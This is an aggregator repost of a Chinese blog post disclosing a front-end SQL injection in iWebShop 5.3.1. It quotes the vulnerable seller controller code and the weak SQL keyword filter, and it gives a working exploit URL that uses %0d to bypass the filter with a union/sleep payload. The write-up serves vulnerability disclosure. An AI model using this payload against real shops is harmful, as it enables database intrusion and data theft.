2
Iwebshop sql注入
source link: https://blue-bird1.github.io/posts/iwebshopsql/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Jan 19, 2019
Iwebshop sql注入
iwebshop 最新版本5.3.1 前台注入
iwebshop最新版存在一个非常弱智的注入漏洞
主要导致原因 $id = IFilter::act(IReq::get('id'));
开发者忘记写成 IFilter::act(IReq::get('id'), 'int')了,导致直接注入. 在其他文件也存在这个问题.
这个文件需要商家账号才可以访问,是可以注册的
漏洞点 controllers/seller.php 函数categoryAjax
public function categoryAjax()
{
$id = IFilter::act(IReq::get('id'));
$parent_id = IFilter::act(IReq::get('parent_id'));
if($id && is_array($id))
{
foreach($id as $category_id)
{
$childString = goods_class::catChild($category_id);//父类ID不能死循环设置成其子分类
if($parent_id > 0 && stripos(",".$childString.",",",".$parent_id.",") !== false)
{ die(JSON::encode(array('result' => 'fail'))); }
}直接将id传入到catChild
public static function catChild($catId,$level = 1)
{ if($level == 0) {
return $catId;
}
$temp = array();
$result = array($catId); $catDB = new IModel('category');
while(true)
{
$id = current($result);
if(!$id)
{
break;
}
$temp = $catDB->query('parent_id = '.$id);
直接将id拼接到sql查询中.. 这个cms有一点sql过滤,但是非常弱,也就ctf入门题的水平
lib/core/util/filter_class.php
public static function string($str,$limitLen = false)
{
$str = trim($str);
$str = self::limitLen($str,$limitLen);
$str = htmlspecialchars($str,ENT_NOQUOTES);
return self::addSlash($str);
}
public static function word($str)
{
$word = array("select ","select/*","update ","update/*","delete ","delete/*","insert into","insert/*","updatexml","concat","()","/**/","union(");
foreach($word as $val)
{
if(stripos($str,$val) !== false)
{
return '';
}
}
return self::removeEmoji($str);
}
不允许union加空格,可是空格的代替很多 比如 %0d
/index.php?controller=seller&action=categoryAjax&id[]=1%20and%201=1%20union%0dselect%0d1,2,3,4,5,6,7,8,sleep(5)
</div
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK